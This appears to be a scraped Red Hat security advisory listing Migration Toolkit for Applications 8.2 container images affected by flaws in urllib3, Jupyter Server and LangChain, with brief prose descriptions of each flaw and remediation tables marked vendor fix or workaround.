| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
A flaw was found in urllib3, an HTTP client library for Python. When using the low-level API via `ProxyManager.connection_from_url().urlopen()` with `assert_same_host=False`, cross-origin redirects can still forward sensitive headers. This could allow a remote attacker to gain unauthorized access to sensitive information.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
A flaw was found in urllib3, an HTTP client library for Python. This vulnerability allows a remote attacker to cause excessive resource consumption, such as high CPU usage and massive memory allocation, on the client side. This occurs when urllib3 attempts to decompress an entire HTTP response, even if only a partial read was requested, or when draining the connection after a partial decompression. This can lead to a Denial of Service (DoS) condition.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
A flaw was found in Jupyter Server. The nbconvert HTTP handlers in Jupyter Server render user-authored notebook HTML without a sandbox directive in their Content-Security-Policy. This, combined with nbconvert.HTMLExporter's default non-sanitizing behavior, allows a notebook containing an HTML payload to trigger a stored Cross-Site Scripting (XSS) vulnerability. A remote attacker could exploit this to gain cookie access, full API authority, and achieve kernel Remote Code Execution (RCE).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
A flaw was found in LangChain, a framework for building agents and large language model (LLM)-powered applications. Older runtime code paths within LangChain deserialize application-controlled payloads using overly broad object allowlists. A remote attacker can exploit this by supplying specially crafted LangChain serialized constructor dictionaries, leading to the instantiation of classes with untrusted arguments. This can result in the disclosure of sensitive information and potential partial compromise of data integrity.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
